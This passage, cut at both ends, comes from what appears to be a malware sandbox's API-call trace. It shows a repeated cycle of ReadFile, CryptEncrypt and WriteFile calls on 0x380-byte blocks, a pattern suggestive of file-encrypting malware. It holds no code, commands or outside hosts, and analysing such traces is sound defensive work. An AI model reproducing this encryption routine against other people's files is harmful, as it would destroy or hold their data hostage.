lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.088] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.088] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.088] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.089] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.089] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.089] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.089] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.089] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.089] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.090] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.090] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.090] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.090] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.090] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.091] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.091] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.091] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.091] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.091] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.091] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.092] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.092] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.092] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.092] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.092] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.092] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.093] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.093] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.093] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.093] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.093] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.093] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.093] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.094] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.094] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.094] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.094] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.094] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.095] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.095] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, 